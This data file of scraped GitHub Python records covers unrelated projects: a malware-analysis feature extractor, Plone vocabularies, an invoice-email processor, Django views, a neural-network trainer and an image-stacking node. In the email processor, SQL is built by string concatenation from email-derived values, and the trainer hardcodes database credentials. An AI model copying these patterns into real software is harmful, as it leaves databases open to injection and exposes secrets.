Path(self.path).read_bytes()\n\n yield from extract_global_features(self.pe, buf)\n\n def extract_file_features(self):\n buf = Path(self.path).read_bytes()\n\n yield from extract_file_features(self.pe, buf)\n\n def get_functions(self):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def extract_function_features(self, f):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def get_basic_blocks(self, f):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def extract_basic_block_features(self, f, bb):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def get_instructions(self, f, bb):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def extract_insn_features(self, f, bb, insn):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def is_library_function(self, va):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n\n def get_function_name(self, va):\n raise NotImplementedError(\"PefileFeatureExtract can only be used to extract file features\")\n","repo_name":"mandiant/capa","sub_path":"capa/features/extractors/pefile.py","file_name":"pefile.py","file_ext":"py","file_size_in_byte":7336,"program_lang":"python","lang":"en","doc_type":"code","stars":3385,"dataset":"github-code","pt":"47"} +{"seq_id":"33646639592","text":"import gzip\nimport json\nimport os\nfrom plone import api\nfrom plone.app.vocabularies.types import BAD_TYPES\nfrom Products.CMFPlone.utils import safe_unicode\nfrom zope.interface import implementer\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleVocabulary\nfrom zope.schema.vocabulary import SimpleTerm\n\n\nwith gzip.open(\n os.path.join(os.path.dirname(__file__), \"browser/static/styles.json.gz\")\n) as styles_file:\n styles_data = json.load(styles_file)\n\ncitations_vocab = SimpleVocabulary(\n [\n SimpleTerm(title=i[\"title\"], value=i[\"name\"], token=str(i[\"name\"]))\n for i in styles_data\n ]\n)\n\n# Build a very simple text index of the style titles\ncitations_text_index = {}\nfor item in styles_data:\n for word in item[\"title\"].lower().split():\n word = word.strip()\n if len(word) > 3:\n matches = citations_text_index.setdefault(word, [])\n matches.append(item[\"name\"])\n\n\n@implementer(IVocabularyFactory)\nclass SearchableCitationStylesVocabulary(object):\n items = citations_vocab\n\n def __call__(self, context, query=None):\n if query is None:\n return self.items\n term_matches = matches = set()\n words = query.split()\n for i, word in enumerate(words):\n word = word.lower().strip()\n if not word:\n continue\n term_matches.update(citations_text_index.get(word, []))\n # Treat the last word as a wildcard if we don't have a match\n if not term_matches and len(word) >= 3 and i == (len(words) - 1):\n for entry in citations_text_index:\n if word in entry:\n term_matches.update(citations_text_index.get(entry))\n if matches is not term_matches:\n matches = matches.intersection(term_matches)\n term_matches = set()\n terms = [self.items.getTerm(v) for v in matches]\n terms.sort(key=lambda t: t.title.lower())\n return SimpleVocabulary(terms)\n\n\nCitationStylesVocabularyFactory = SearchableCitationStylesVocabulary()\n\n\n@implementer(IVocabularyFactory)\nclass 
TypesTitlesVocabulary(object):\n    bad_types = set(BAD_TYPES)\n\n    def __call__(self, context):\n        catalog = api.portal.get_tool('portal_catalog')\n        titles = [\n            t for t in catalog.uniqueValuesFor('Type') if t and t not in self.bad_types\n        ]\n        terms = [SimpleTerm(t, title=safe_unicode(t), token=t) for t in titles]\n        terms.sort(key=lambda t: t.value)\n        return SimpleVocabulary(terms)\n\n\nTypesTitlesVocabularyFactory = TypesTitlesVocabulary()\n","repo_name":"jazkarta/jazkarta.zoterolib","sub_path":"src/jazkarta/zoterolib/vocabs.py","file_name":"vocabs.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"15290553039","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport datetime, re\nimport psycopg2\nfrom configparser import ConfigParser\nfrom models.reg import reg\nfrom common.funciones import Funcion\n\nEmp = \"\"\nano = 0\nmes = 0\ndia = 0\n\ndatenow = datetime.datetime.now()\nhournow = str(datenow.hour) + \":\" + str(datenow.minute) + \":\" + str(datenow.second)\n\nconfig = ConfigParser()\nconfig.read('config/config.ini')\ncorreo = config.get('personal','CORREO_O')\npassword = config.get('personal','PASS')\ncarpeta = config.get('doc_soporte','IMAP_NA')\ncargue_string = config.get('correo_confirmacion','CARGUE_NOTA_AJUSTE')\nerror_string = config.get('correo_error','ERROR_NOTA_AJUSTE')\n\nclass NotaAjuste:\n\n    def leer_correos_nota_ajuste(self, con, env):\n        cursor = con.cursor()\n        conexion = con\n        enviar = env\n        cambio = re.sub(\"_\", \" \", carpeta)\n\n        Funcion(cursor, conexion, enviar).get_datos_centro_costo()\n        data_correos = Funcion(cursor, conexion, enviar).analizar_correo(correo, password, carpeta)\n\n        if data_correos != None:\n            for dato in data_correos:\n                asunto = dato[\"asunto\"]\n                filename = dato[\"filename\"]\n                valida_asunto = Funcion(cursor, conexion, enviar).validar_asunto_correo(\"N\", asunto)\n                if valida_asunto != False:\n                    empresa_codigo = valida_asunto[\"empresa_codigo\"]\n                    documento = valida_asunto[\"cod_doc_asunto\"]\n                    empresa = valida_asunto[\"empresa\"]\n                if valida_asunto is False:\n                    mensaje = \"\\033[91mEl Asunto no es correcto o esta mal formado (no tiene el numero de documento \" \\\n                              \"soporte), se envía correo y se detiene el proceso\\033[0m\\n\"\n                    print(mensaje)\n                    break\n                datos_nota_ajuste = self.get_datos_nota_ajuste(cursor, empresa_codigo, documento, empresa)\n                if datos_nota_ajuste is False:\n                    mensaje = \"\\033[91mNo se lograron obtener datos de la \" + cambio.upper() + \"\\033[0m\"\n                    print(mensaje)\n                    break\n                nota_ajuste = datos_nota_ajuste[\"cod_nota_ajuste\"]\n                ruta = datos_nota_ajuste[\"digitalizado_ruta\"]\n                insert_digi = Funcion(cursor, conexion, enviar).insertar_digitalizado(346, 285, nota_ajuste, ruta, filename, cargue_string, error_string)\n                if insert_digi:\n                    archivo_zip = insert_digi\n                    self.actualizar_nota_ajuste(cursor, conexion, archivo_zip, nota_ajuste)\n                    Funcion(cursor, conexion, enviar).eventos(nota_ajuste, 346)\n        mensaje = \"\\033[91mNo existen mensajes sin leer en la cuenta \" + correo + \" en la carpeta \" + cambio.upper() + \"\\033[0m\"\n        print (mensaje)\n        mensaje = \"\\033[93m*********************************************** Proceso Finalizado \" + cambio.upper() + \" ***********************************************\\033[0m\\n\\n\"\n        print (mensaje)\n\n    def get_datos_nota_ajuste(self, cursor, empresa_codigo, nota_ajuste, empresa):\n        global detach_dir, detach_dir1, cod_nota_ajuste, cencos_nota_ajuste, fecha_nota_ajuste, ano, mes, dia\n        nota_ajuste_sql = 
\"SELECT na.notaju_codigo, na.notaju_fechacreacion, na. docsop_codigo, na.empresa_codigo, na.cencos_codigo FROM tb_notaajuste na WHERE na.empresa_codigo = \" + str(empresa_codigo) + \" AND na.notaju_cencoscodigo = \"+ str(nota_ajuste)\n mensaje = \"\\033[94mConsulta de la Nota Ajuste de la Empresa \" + str(empresa_codigo) + \" DigCCResolucion \" + str(nota_ajuste) + \" ejecutada con éxito\\033[0m\"\n try:\n print(\"\\033[94m######################### SQL get_datos() #################################\\033[0m\")\n print (\"\\033[94m\" + nota_ajuste_sql + \"\\033[0m\")\n cursor.execute(nota_ajuste_sql)\n print (mensaje)\n outfile = '.'\n ContAux = 0\n for row in cursor.fetchall():\n r = reg(cursor, row)\n cod_nota_ajuste = r.notaju_codigo\n cencos_nota_ajuste = r.cencos_codigo\n fecha_nota_ajuste = str(r.notaju_fechacreacion)\n ano = fecha_nota_ajuste.split(\"-\")[0]\n mes = fecha_nota_ajuste.split(\"-\")[1]\n dia = fecha_nota_ajuste.split(\"-\")[2]\n digitalizado_ruta = '/usr/local/apache/htdocs/switrans/images/documentosoporte/' + str(empresa) + '/' + str(\n ano) + '/' + str(cencos_nota_ajuste) + '/' + str(mes) + '/'\n ContAux = ContAux + 1\n print(\"\\033[92m######################### RESULTADO SQL get_datos() #################################\\033[0m\\n\" + \"\\033[92mnotaju_codigo = \" + str(\n cod_nota_ajuste) + \"\\n\" + \"cencos_codigo = \" + str(cencos_nota_ajuste) + \"\\n\" + \"notaju_fechacreacion = \" + fecha_nota_ajuste + \"\\033[0m\\n\")\n if ContAux > 0:\n datos_nota_ajuste = {\n \"cod_nota_ajuste\": cod_nota_ajuste,\n \"digitalizado_ruta\": digitalizado_ruta\n }\n return datos_nota_ajuste\n else:\n return False\n except psycopg2.Error as e:\n print(e.pgerror)\n return False\n\n def actualizar_nota_ajuste(self, cursor, conexion, filename, nota_ajuste):\n updateNotaAjuste = (\n \"UPDATE tb_notaajuste SET archivo_notaajuste_electronico = '\" + filename + \"' WHERE notaju_codigo = \" + str(\n nota_ajuste))\n try:\n cursor.execute(updateNotaAjuste)\n conexion.commit()\n mensaje = \"\\033[93mNota Ajuste Actualizada a base de datos tb_notaajuste, campo: archivo_notaajuste_electronico \\n._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._\\033[0m\"\n print(mensaje)\n except psycopg2.Error as e:\n mensaje = e.pgerror\n print(mensaje)\n print(\"ERROR FATAL EN LA CONSULTA \" + str(updateNotaAjuste))\n errorFile = 1","repo_name":"ojcarrillomiranda/lector-de-correos","sub_path":"models/nota_ajuste.py","file_name":"nota_ajuste.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31338937012","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Category, Tag, Post\nfrom django.db.models import Q, F\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n\n\ndef index(request):\n # 查询首页数据并显示在页面\n\n post_list = Post.objects.all() # 查询到所有的文章\n # 分页方法\n paginator = Paginator(post_list, 4) # 第二个参数2代表每页显示几个\n page_number = request.GET.get('page') #?page = 1 (页码)\n page_obj = paginator.get_page(page_number)\n context = {'post_list': post_list, 'page_obj': page_obj}\n return render(request, 'blog/index.html', context)\n\n\ndef category_list(request, category_id):\n category = get_object_or_404(Category, id=category_id)\n # 获取当前分类下的所有文章\n posts = category.post_set.all()\n paginator = Paginator(posts, 2) # 第二个参数2代表每页显示几个\n page_number = request.GET.get('page') # http://assas.co/?page=1 (页码)\n page_obj = 
paginator.get_page(page_number)\n context = {'category': category, 'page_obj': page_obj}\n return render(request, 'blog/list.html', context)\n\n\ndef post_detail(request, post_id):\n # 文章详情页\n post = get_object_or_404(Post, id=post_id)\n\n prev_post = Post.objects.filter(id__lt=post_id).last() # 上一篇queryset\n next_post = Post.objects.filter(id__gt=post_id).first() # 下一篇queryset\n\n Post.objects.filter(id=post_id).update(Browse_rate=F('Browse_rate') + 1)\n context = {'post': post, 'prev_post': prev_post, 'next_post': next_post}\n return render(request, 'blog/detail.html', context)\n\n\ndef search(request):\n \"\"\"搜索视图\"\"\"\n keyword = request.GET.get('keyword')\n # 没有搜索默认显示文章\n if not keyword:\n post_list = Post.objects.all()\n else:\n post_list = Post.objects.filter(Q(title__icontains=keyword) | Q(desc__icontains=keyword))\n paginator = Paginator(post_list, 2) # 第二个参数2代表每页显示几个\n page_number = request.GET.get('page') # http://assas.co/?page=1 (页码)\n page_obj = paginator.get_page(page_number)\n context = {\n 'page_obj': page_obj\n }\n return render(request, 'blog/index.html', context)\n\n\ndef archives(request, year, month):\n #文章归档\n post_list = Post.objects.filter(add_date__year=year, add_date__month=month)\n context = {'post_list': post_list, 'year': year, 'month': month}\n return render(request, 'blog/sidebar/archives_list.html', context)\n","repo_name":"Asukaki7/PersonalBlog","sub_path":"mysite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74073027662","text":"# %load network.py\n\n\"\"\"\nnetwork.py\n~~~~~~~~~~\nIT WORKS\n\nA module to implement the stochastic gradient descent learning\nalgorithm for a feedforward neural network. Gradients are calculated\nusing backpropagation. Note that I have focused on making the code\nsimple, easily readable, and easily modifiable. It is not optimized,\nand omits many desirable features.\n\"\"\"\n\n#### Libraries\n# Standard library\nimport random\n\n# Third-party libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\n\n# SQL Database Code\nimport mysql.connector\n\ntry:\n db = mysql.connector.connect(\n host=\"localhost\",\n username=\"root\",\n password=\"pass\",\n database=\"networkdatabase\"\n )\n mycursor = db.cursor(buffered=True)\n print(\"Successfully Connected to Database\")\nexcept:\n print(\"ERR: Could not connect to database\")\n\n\n# Change Graph Style\nstyle.use(\"ggplot\")\n\nclass Network(object):\n\n def __init__(self, sizes):\n \"\"\"The list ``sizes`` contains the number of neurons in the\n respective layers of the network. For example, if the list\n was [2, 3, 1] then it would be a three-layer network, with the\n first layer containing 2 neurons, the second layer 3 neurons,\n and the third layer 1 neuron. The biases and weights for the\n network are initialized randomly, using a Gaussian\n distribution with mean 0, and variance 1. 
Note that the first\n layer is assumed to be an input layer, and by convention we\n won't set any biases for those neurons, since biases are only\n ever used in computing the outputs from later layers.\"\"\"\n self.num_layers = len(sizes)\n self.sizes = sizes\n self.biases = [np.random.randn(y, 1) for y in sizes[1:]]\n self.weights = [np.random.randn(y, x)\n for x, y in zip(sizes[:-1], sizes[1:])]\n\n def feedforward(self, a):\n \"\"\"Return the output of the network if ``a`` is input.\"\"\"\n for b, w in zip(self.biases, self.weights):\n a = sigmoid(np.dot(w, a)+b)\n return a\n\n def SGD(self, training_data, epochs, mini_batch_size, eta,\n test_data=None):\n \"\"\"Train the neural network using mini-batch stochastic\n gradient descent. The ``training_data`` is a list of tuples\n ``(x, y)`` representing the training inputs and the desired\n outputs. The other non-optional parameters are\n self-explanatory. If ``test_data`` is provided then the\n network will be evaluated against the test data after each\n epoch, and partial progress printed out. This is useful for\n tracking progress, but slows things down substantially.\"\"\"\n\n self.accuracy = []\n self.epochs = epochs\n self.mini_batch_size = mini_batch_size\n self.eta = eta\n\n training_data = list(training_data)\n n = len(training_data)\n\n if test_data:\n test_data = list(test_data)\n n_test = len(test_data)\n\n for j in range(epochs):\n random.shuffle(training_data)\n mini_batches = [\n training_data[k:k+mini_batch_size]\n for k in range(0, n, mini_batch_size)]\n for mini_batch in mini_batches:\n self.update_mini_batch(mini_batch, eta)\n if test_data:\n print(\"Epoch {} : {} / {}\".format(j,self.evaluate(test_data),n_test))\n self.accuracy.append(round(self.evaluate(test_data)*100/n_test,2))\n\n else:\n print(\"Epoch {} complete\".format(j))\n\n def update_mini_batch(self, mini_batch, eta):\n \"\"\"Update the network's weights and biases by applying\n gradient descent using backpropagation to a single mini batch.\n The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta``\n is the learning rate.\"\"\"\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n for x, y in mini_batch:\n delta_nabla_b, delta_nabla_w = self.backprop(x, y)\n nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]\n nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]\n self.weights = [w-(eta/len(mini_batch))*nw\n for w, nw in zip(self.weights, nabla_w)]\n self.biases = [b-(eta/len(mini_batch))*nb\n for b, nb in zip(self.biases, nabla_b)]\n\n def backprop(self, x, y):\n \"\"\"Return a tuple ``(nabla_b, nabla_w)`` representing the\n gradient for the cost function C_x. 
``nabla_b`` and\n ``nabla_w`` are layer-by-layer lists of numpy arrays, similar\n to ``self.biases`` and ``self.weights``.\"\"\"\n nabla_b = [np.zeros(b.shape) for b in self.biases]\n nabla_w = [np.zeros(w.shape) for w in self.weights]\n # feedforward\n activation = x\n activations = [x] # list to store all the activations, layer by layer\n zs = [] # list to store all the z vectors, layer by layer\n for b, w in zip(self.biases, self.weights):\n z = np.dot(w, activation)+b\n zs.append(z)\n activation = sigmoid(z)\n activations.append(activation)\n # backward pass\n delta = self.cost_derivative(activations[-1], y) * \\\n sigmoid_prime(zs[-1])\n nabla_b[-1] = delta\n nabla_w[-1] = np.dot(delta, activations[-2].transpose())\n # Note that the variable l in the loop below is used a little\n # differently to the notation in Chapter 2 of the book. Here,\n # l = 1 means the last layer of neurons, l = 2 is the\n # second-last layer, and so on. It's a renumbering of the\n # scheme in the book, used here to take advantage of the fact\n # that Python can use negative indices in lists.\n for l in range(2, self.num_layers):\n z = zs[-l]\n sp = sigmoid_prime(z)\n delta = np.dot(self.weights[-l+1].transpose(), delta) * sp\n nabla_b[-l] = delta\n nabla_w[-l] = np.dot(delta, activations[-l-1].transpose())\n return (nabla_b, nabla_w)\n\n def evaluate(self, test_data):\n \"\"\"Return the number of test inputs for which the neural\n network outputs the correct result. Note that the neural\n network's output is assumed to be the index of whichever\n neuron in the final layer has the highest activation.\"\"\"\n test_results = [(np.argmax(self.feedforward(x)), y)\n for (x, y) in test_data]\n return sum(int(x == y) for (x, y) in test_results)\n\n def cost_derivative(self, output_activations, y):\n \"\"\"Return the vector of partial derivatives \\partial C_x /\n \\partial a for the output activations.\"\"\"\n return (output_activations-y)\n\n def plotAccuracy(self):\n plt.plot(self.accuracy)\n plt.ylabel('accuracy (%)')\n plt.xlabel('Number of Epochs (from 0)')\n plt.show()\n\n def findMax(self):\n self.epochPos = 0\n #must have arrayName[index].fieldName (since it is an array of records)\n self.maxi = self.accuracy[0]\n \n for i in range(1,self.epochs):\n\n if self.accuracy[i] > self.maxi:\n self.maxi = self.accuracy[i]\n self.epochPos = i\n\n def outputResults(self,networkName):\n with open(\"results.txt\",\"a\") as writefile:\n #modelID, modelName, numHidden, epochs, mini_batch_size, eta, modelID2, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray = x\n line = (networkName+\",\"+ str(self.sizes[1]) + \",\" + str(self.epochs) +\",\" + str(self.mini_batch_size) + \",\" + str(self.eta) + \",\" + str(self.accuracy[len(self.accuracy)-1]) + \",\" + str(self.maxi) + \",\" + str(self.epochPos) + \",\" + str(self.accuracy) + \"\\n\")\n writefile.write(line)\n\n #---- WRONG ORDER-------\n # #name, current accuracy, max accuracy, max accuracy epoch, accuracyArray, numHidden, epochs, mini_batch_size, eta\n # line = (networkName+\",\"+ str(self.accuracy[len(self.accuracy)-1]) + \",\" + str(self.maxi) +\",\" + str(self.epochPos) + \",\" + str(self.accuracy) + \",\" + str(self.sizes[1]) + \",\" + str(self.epochs) + \",\" + str(self.mini_batch_size) + \",\" + str(self.eta) + \"\\n\")\n # writefile.write(line)\n\n writefile.close()\n\n def writeModel(self,networkName):\n try:\n insertModel = \"INSERT INTO Models (modelName, numHidden, epochs, mini_batch_size, eta) VALUES (%s,%s,%s,%s,%s)\"\n 
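# values are bound via the connector's %s placeholders, so quoting and escaping are handled safely\n            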
mycursor.execute(insertModel,(networkName, str(self.sizes[1]), str(self.epochs), str(self.mini_batch_size), str(self.eta)))\n db.commit()\n\n last_id = mycursor.lastrowid\n # print(last_id)\n\n insertAccuracy = \"INSERT INTO Accuracy (modelID, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray) VALUES (%s,%s,%s,%s,%s)\"\n mycursor.execute(insertAccuracy,(last_id,str(self.accuracy[len(self.accuracy)-1]),str(self.maxi),str(self.epochPos),str(self.accuracy)))\n db.commit()\n except:\n print(\"ERROR: Unable to Insert\")\n \n \n def databaseToFile(self):\n mycursor.execute(\"SELECT * FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID\")\n #print(\"Loop1\")\n\n with open(\"results.txt\",\"a\") as writefile:\n #print(\"Loop2\")\n for x in mycursor:\n #print(\"Loop3\")\n modelID, modelName, numHidden, epochs, mini_batch_size, eta, modelID2, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray = x\n #name, current accuracy, max accuracy, max accuracy epoch, accuracyArray numHidden, epochs, mini_batch_size, eta\n line = (modelName+\",\"+ str(numHidden) + \",\" + str(epochs) +\",\" + str(mini_batch_size) + \",\" + str(eta) + \",\" + str(currentAccuracy) + \",\" + str(maxAccuracy) + \",\" + str(maxAccuracyEpoch) + \",\" + str(accuracyArray) +\"\\n\")\n # WRONG ORDER line = (modelName+\",\"+ str(currentAccuracy) + \",\" + str(maxAccuracy) +\",\" + str(maxAccuracyEpoch) + \",\" + str(accuracyArray) + \",\" + str(numHidden) + \",\" + str(epochs) + \",\" + str(mini_batch_size) + \",\" + str(eta) +\"\\n\")\n writefile.write(line)\n\n writefile.close()\n\n\n def getModel(self,queryID,queryName,queryAccuracy):\n searchModel = \"SELECT modelID, modelName, numHidden, epochs, mini_batch_size, eta, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID AND modelID LIKE %s AND modelName LIKE %s AND maxAccuracy LIKE %s\"\n print(queryAccuracy)\n #mycursor.execute(searchModel)\n mycursor.execute(searchModel, (\"%\" + queryID + \"%\",\"%\" + queryName + \"%\", queryAccuracy + \"%\"))\n rows = mycursor.fetchall()\n rowCount = mycursor.rowcount\n # for x in mycursor:\n # print(x)\n # print(\"Total Data Entries: \",rowCount)\n\n return rows,rowCount\n \n def deleteModel(self,ID):\n queryRecordExists = \"SELECT COUNT(1) FROM Models WHERE ID = %s\"\n mycursor.execute(queryRecordExists, (str(ID),))\n recordExists = mycursor.fetchall()\n print(recordExists)\n if recordExists == [(1,)]:\n deleteQueryAccuracy = \"DELETE FROM Accuracy WHERE modelID = %s\"\n deleteQueryModels = \"DELETE FROM Models WHERE ID = %s\"\n mycursor.execute(deleteQueryAccuracy, (str(ID),))\n mycursor.execute(deleteQueryModels, (str(ID),))\n db.commit()\n print(\"Record\" ,ID, \"Deleted\")\n return True\n return False\n\n \n def showDatabase(self):\n # mycursor.execute(\"SELECT * FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID\") - This includes modelID twice\n mycursor.execute(\"SELECT modelID, modelName, numHidden, epochs, mini_batch_size, eta, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID\")\n for x in mycursor:\n print(x)\n\n def readFileData(self):\n self.savedNetworks = []\n #self.savedNetworks = [[-1]*9 for i in range(10)] #This only works for 10 models\n with open('results.txt','r') as readFile:\n \n line = readFile.readline().rstrip(\"\\n\")\n counter = 0\n \n while line:\n self.savedNetworks.append([-1]*9)\n #modelName, numHidden, epochs, mini_batch_size, eta, 
currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray = x\n                \n                items = line.split(\",\")\n\n                self.savedNetworks[counter][0] = items[0] #name\n                self.savedNetworks[counter][1] = int(items[1]) #numHidden\n                self.savedNetworks[counter][2] = int(items[2]) #epochs\n                self.savedNetworks[counter][3] = int(items[3]) #mini_batch_size\n                self.savedNetworks[counter][4] = float(items[4]) #eta\n                self.savedNetworks[counter][5] = float(items[5]) #currentAccuracy\n                self.savedNetworks[counter][6] = float(items[6]) #maxAccuracy\n                self.savedNetworks[counter][7] = int(items[7]) #maxAccuracyEpoch\n                self.savedNetworks[counter][8] = str(items[8]) #accuracyArray\n                \n                #-----WRONG ORDER-------\n                # self.savedNetworks[counter][0] = items[0] #name\n                # self.savedNetworks[counter][1] = float(items[1]) #current accuracy\n                # self.savedNetworks[counter][2] = float(items[2]) #max accuracy\n                # self.savedNetworks[counter][3] = int(items[3]) #max accuracy epoch\n                # self.savedNetworks[counter][3] = items[4] #accuracy array\n                # self.savedNetworks[counter][4] = int(items[5]) #numHidden\n                # self.savedNetworks[counter][5] = int(items[6]) #epochs\n                # self.savedNetworks[counter][6] = int(items[7]) #mini_batch_size\n                # self.savedNetworks[counter][7] = float(items[8]) #eta\n                \n                counter = counter + 1\n\n                \n                line = readFile.readline().rstrip(\"\\n\")\n            \n            #end while\n        return self.savedNetworks\n\n    def insertionSort(self,arr):\n        # insertion sort of model records in descending order of maxAccuracy (column 6)\n        for i in range(1,len(arr)): \n            currentValue = arr[i]\n            pos = i\n            while pos > 0 and arr[pos-1][6] < currentValue[6]:\n                arr[pos] = arr[pos-1]\n                pos = pos - 1\n            arr[pos] = currentValue\n        return arr\n\n    def sortSavedNetworks(self):\n        # the same insertion sort applied in place to the cached self.savedNetworks list\n        for i in range(1,len(self.savedNetworks)):\n            currentValue = self.savedNetworks[i]\n            pos = i\n            while pos > 0 and self.savedNetworks[pos-1][6] < currentValue[6]:\n                self.savedNetworks[pos] = self.savedNetworks[pos-1]\n                pos = pos - 1\n            self.savedNetworks[pos] = currentValue\n
def getWidth(img: Image | null) = match img { null => 0, _ as i => i.width };\n                def getHeight(img: Image | null) = match img { null => 0, _ as i => i.height };\n                def getChannels(img: Image | null) {\n                    match img {\n                        null => 0,\n                        _ as i => match i.channels { 1 => 3, _ as c => c }\n                    }\n                }\n\n                let maxWidth = max(Input0.width, getWidth(Input1), getWidth(Input2), getWidth(Input3));\n                let maxHeight = max(Input0.height, getHeight(Input1), getHeight(Input2), getHeight(Input3));\n                let maxChannels = max(Input0.channels, getChannels(Input1), getChannels(Input2), getChannels(Input3));\n\n                def getAdjustedWidth(img: Image | null) {\n                    match img {\n                        null => 0,\n                        _ as i => uint & round(i.width * maxHeight / i.height)\n                    }\n                }\n                def getAdjustedHeight(img: Image | null) {\n                    match img {\n                        null => 0,\n                        _ as i => uint & round(i.height * maxWidth / i.width)\n                    }\n                }\n\n                let widthSum = getAdjustedWidth(Input0) + getAdjustedWidth(Input1) + getAdjustedWidth(Input2) + getAdjustedWidth(Input3);\n                let heightSum = getAdjustedHeight(Input0) + getAdjustedHeight(Input1) + getAdjustedHeight(Input2) + getAdjustedHeight(Input3);\n\n                Image {\n                    width: match Input4 {\n                        Orientation::Vertical => maxWidth,\n                        Orientation::Horizontal => widthSum\n                    },\n                    height: match Input4 {\n                        Orientation::Vertical => heightSum,\n                        Orientation::Horizontal => maxHeight\n                    },\n                    channels: maxChannels\n                }\n                \"\"\"\n            )\n        ]\n        self.category = ImageUtilityCategory\n        self.name = \"Stack Images\"\n        self.icon = \"CgMergeVertical\"\n        self.sub = \"Compositing\"\n\n    def run(\n        self,\n        im1: np.ndarray,\n        im2: np.ndarray | None,\n        im3: np.ndarray | None,\n        im4: np.ndarray | None,\n        orientation: Orientation,\n    ) -> np.ndarray:\n        img = im1\n        imgs = []\n        max_h, max_w, max_c = 0, 0, 1\n        for img in im1, im2, im3, im4:\n            if img is not None:\n                h, w, c = get_h_w_c(img)\n                if c == 1:\n                    img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)\n                    c = 3\n                max_h = max(h, max_h)\n                max_w = max(w, max_w)\n                max_c = max(c, max_c)\n                imgs.append(img)\n\n        fixed_imgs: List[np.ndarray] = []\n        for img in imgs:\n            h, w, c = get_h_w_c(img)\n\n            fixed_img = 
img\n # Fix images so they resize proportionally to the max image\n if orientation == Orientation.HORIZONTAL:\n if h < max_h:\n fixed_img = cv2.resize(\n img,\n (round_half_up(w * max_h / h), max_h),\n interpolation=cv2.INTER_NEAREST,\n )\n elif orientation == Orientation.VERTICAL:\n if w < max_w:\n fixed_img = cv2.resize(\n img,\n (max_w, round_half_up(h * max_w / w)),\n interpolation=cv2.INTER_NEAREST,\n )\n else:\n assert False, f\"Invalid orientation '{orientation}'\"\n\n # Expand channel dims if necessary\n if c < max_c:\n temp_img = np.ones((max_h, max_w, max_c))\n temp_img[:, :, :c] = fixed_img\n fixed_img = temp_img\n\n fixed_imgs.append(fixed_img.astype(\"float32\"))\n\n if orientation == Orientation.HORIZONTAL:\n for i in range(len(fixed_imgs)):\n assert (\n fixed_imgs[i].shape[0] == fixed_imgs[0].shape[0]\n ), \"Inputted heights are not the same and could not be auto-fixed\"\n assert (\n fixed_imgs[i].dtype == fixed_imgs[0].dtype\n ), \"The image types are not the same and could not be auto-fixed\"\n img = cv2.hconcat(fixed_imgs) # type: ignore\n elif orientation == Orientation.VERTICAL:\n for i in range(len(fixed_imgs)):\n assert (\n fixed_imgs[i].shape[1] == fixed_imgs[0].shape[1]\n ), \"Inputted widths are not the same and could not be auto-fixed\"\n assert (\n fixed_imgs[i].dtype == fixed_imgs[0].dtype\n ), \"The image types are not the same and could not be auto-fixed\"\n img = cv2.vconcat(fixed_imgs) # type: ignore\n else:\n assert False, f\"Invalid orientation '{orientation}'\"\n\n return img\n","repo_name":"orgTestCodacy11KRepos110MB/repo-1470-chaiNNer","sub_path":"backend/src/nodes/nodes/image_utility/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18244902028","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n# Time complexity: O(2**n * 2**n) = O(2**2n)\n# Space complexity: O(2**n)\n\n\nclass Solution:\n def maxStudents(self, seats: List[List[str]]) -> int:\n m = len(seats)\n n = len(seats[0])\n valid_seats = [0] * m\n for i in range(m):\n for j in range(n):\n valid_seats[i] |= 1 << j if seats[i][j] == '.' else 0\n\n def count_bit(n):\n count = 0\n while n:\n count += n & 1\n n >>= 1\n\n return count\n\n dp = [-1] * (1 << n)\n for i in range(m):\n temp = [-1] * (1 << n)\n for j in range(valid_seats[i] + 1): # 这里也可以是 range(1<> 1) == 0: # 判断是否是一个子集,证明没有broken seat,然后判断有没有相邻的位置被占了\n if i == 0:\n temp[j] = count_bit(j) # 填第一行\n else:\n for k in range(1 << n): # k代表上一轮能走到的state, 我们从上一轮的所有state,state j能到的数\n if k & (j >> 1) == 0 and (k >> 1) & j == 0 and dp[k] != -1: # 看右上角,左上角有没有被占了,然后看k这个state上一轮能不能走到\n temp[j] = max(temp[j], dp[k] + count_bit(j))\n dp = temp\n\n return max(dp)\n\n# same idea\nfrom functools import lru_cache\n\n\nclass Solution:\n def 